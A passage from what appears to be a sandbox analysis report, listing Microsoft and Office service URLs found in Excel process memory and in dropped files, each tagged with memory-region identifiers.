    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspxAwsCgQueryhttps://
    Source: EXCEL.EXE, 00000000.00000003.756085438.000000000F935000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576719662.000000000F935000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.504427495.000000000F935000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsons
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13IdentityServicehttps://identity.
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://powerlift-frontdesk.acompli.netPowerLiftGymBaseUrlhttps://powerlift.acompli.netSubstrateOffi
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://powerlift.acompli.netI
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: EXCEL.EXE, 00000000.00000003.301259993.0000000013319000.00000004.00000001.sdmpString found in binary or memory: https://r.st
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsono
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptioneventsMBI_SSLhttps://rpsticket.partnerservices.getmicr
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://roaming.edog.
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://s.w.org/images/core/emoji/13.1.0/svg/1f609.svg
    Source: EXCEL.EXE, 00000000.00000003.620387042.0000000015CC9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496136288.00000000135F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.677925063.0000000015CC9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.768840672.0000000015CC6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756202435.0000000015CC4000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://schema.org
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://settings.outlook.com
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://settings.outlook.comH
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://shell.suite.office.com:14430
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workPowerBIGetDatasetsApihttps://api.pow
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workhttps://login.windows.net/common/oau
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://staging.cortana.ai
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.aiBearer
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.aihttps://login.windows.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.airl
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation0
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://store.office.cn/addinstemplate7
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com&
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWrite
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory(
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistoryMBI_SSL
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/search/api/v2/initMBI_SSL
